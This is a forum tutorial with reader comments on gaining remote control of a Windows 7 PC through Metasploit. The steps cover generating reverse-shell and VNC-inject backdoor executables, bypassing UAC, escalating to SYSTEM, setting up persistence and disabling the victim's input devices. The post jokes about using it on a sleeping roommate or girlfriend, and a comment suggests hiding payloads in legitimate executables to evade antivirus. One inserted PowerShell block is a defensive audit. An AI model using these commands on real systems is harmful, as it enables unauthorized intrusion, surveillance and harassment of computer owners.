How To: Run a VNC Server on Win7

OTW's great tutorial Hack Like a Pro: How to Save the World from Nuclear Annihilation gave me the inspiration to try this on Win7 SP1.

I did this under Bugtraq 2 Black Widow, but it works almost the same on Kali Linux.

Step 1: Start All Services and Run Metasploit

On Bugtraq it is not preinstalled, so:

# sudo apt-get install vncviewer

Then start the required services:

# sudo service postgresql start
# sudo service metasploit start
# sudo msfconsole

Step 2: We Need Two Payloads

I did this with msfpayload. First we need the Meterpreter payload:

msf > msfpayload windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<listening-port> X > /home/bugtraq/Desktop/backdoor.exe

Now we have the file backdoor.exe on our Desktop. Next we need another .exe file that we will upload to the target and execute through the Meterpreter session.

msf > msfpayload windows/vncinject/reverse_tcp LHOST=<your-ip> LPORT=<listening-port> X > /home/bugtraq/Desktop/gui.exe

Step 3: Let's Run the Meterpreter and Bypass UAC

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>

msf exploit(handler) > exploit

So we see that the Meterpreter is running on the target, but we need more system rights.

meterpreter > getprivs
meterpreter > getsystem

Access Denied!!

This should not be a big problem.
You can look at your privileges with the command
meterpreter > run post/windows/gather/winprivs

meterpreter > background

msf exploit(handler) > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST <your-ip>
msf exploit(bypassuac) > set LPORT <port>
msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

If that happens, simply try again:
msf exploit(bypassuac) > exploit

It works, now:

meterpreter > getsystem
meterpreter > getprivs

Now we should own the system, but we want VNC on the target.
If you want to make the Meterpreter persistent, in case something goes wrong, just type

meterpreter > run persistence -A -L c:\\ -X 5 -p <port> -r <your-ip>
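As the defender's counterpart to this step, here is an added PowerShell audit (my example, not code from the original post or from Metasploit): it reports whether UAC is set to "Always notify", the level at which the in-session bypassuac module used above does not work, and lists Run-key entries of the kind the persistence script registers (a .vbs dropped under the -L path, here C:\). The registry paths and value names are standard Windows ones; the match heuristics are my assumptions.

```powershell
# Added audit script (not part of the original post). Registry paths are the standard
# Win7 UAC policy and Run keys; the "suspicious" heuristics are assumptions for illustration.

function Get-UacStatus {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        # 2 = "Always notify"; the bypass in Step 3 relies on the default level (5) being in place
        AlwaysNotify               = ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -eq 2)
    }
}

function Get-SuspiciousRunEntries {
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    )
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        # Skip the PS* metadata properties that Get-ItemProperty adds to the object
        $names = ($props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' }).Name
        foreach ($name in $names) {
            $cmd = [string]$props.$name
            # Heuristics (assumed): a script interpreter / .vbs, or a file sitting directly in a drive root
            $isScript   = $cmd -match '(?i)\.vbs|wscript|cscript'
            $isRootFile = $cmd -match '(?i)^"?[a-z]:\\[^\\]+\.(exe|vbs|bat)"?'
            if ($isScript -or $isRootFile) {
                [pscustomobject]@{ Key = $key; Name = $name; Command = $cmd }
            }
        }
    }
}

Get-UacStatus
Get-SuspiciousRunEntries
```

Run it from an elevated PowerShell prompt on the audited machine; an empty result from Get-SuspiciousRunEntries and AlwaysNotify = True is the state you want to see.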

Step 4: Now the Fun Part

The Meterpreter has download and upload functions, which work like this:
meterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/

Now we open a second Metasploit terminal and type in

msf > use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit

It should now look like this

Step 5: Finishing Up...

Now we go back to our Meterpreter terminal. Make sure you are in the folder C:/ where the gui.exe file is, and type in
meterpreter > execute -f gui.exe

Step 6: MUCH More FUN

Let's say a person (roommate/girlfriend/whatever) is asleep in front of the target PC. If you want to wake him or her in an annoying way, look for their music and have some fun hehe,

meterpreter > uictl disable mouse
meterpreter > uictl disable keyboard

and have fun :D

I am sure there are better ways to do this hack,
but it works; suggestions for improvement are always welcome!

Hope you enjoyed it.

7 Comments

Thanks :)

What if there is some kind of antivirus installed on the target pc?

These are raw payloads (script kiddie like), for testing purposes only!

If you really want to do that in a realistic way, you can turn on your AV and encode and embed the payloads in legitimate exe files to avoid detection. So better use msfvenom instead of msfpayload, because msfpayload seems inaccurate and is getting deleted from the Metasploit database in June or something.

Our teacher OTW has some nice tutorials on avoiding AV detection, but if you want I can do another tutorial in a realistic way, so with encoded payloads and AV turned on.

Hi, I have a question. I've seen many different ways where the attacker can gain access to the victim's PC by running VNC on Kali Linux, but personally when I run VNC I can monitor the victim's screen but I couldn't control/take over control of his PC. Why is that? Is it because I didn't install something extra for it to work?

Good job. Just to note, when downloading/uploading using Meterpreter, one has to use double slashes when specifying the directory, i.e. download C:\\topsecret\\secret.txt //usr//share. And one question: after executing the bypass for UAC, which session did you continue using? Session 2 or 1? Thanks

Thanks for the note; in my case it also works without double slashes.

After executing the bypass for UAC, Metasploit opens a second session for that. So I continue working in session 2; session 1 can be closed.

Sorry for answering so late.
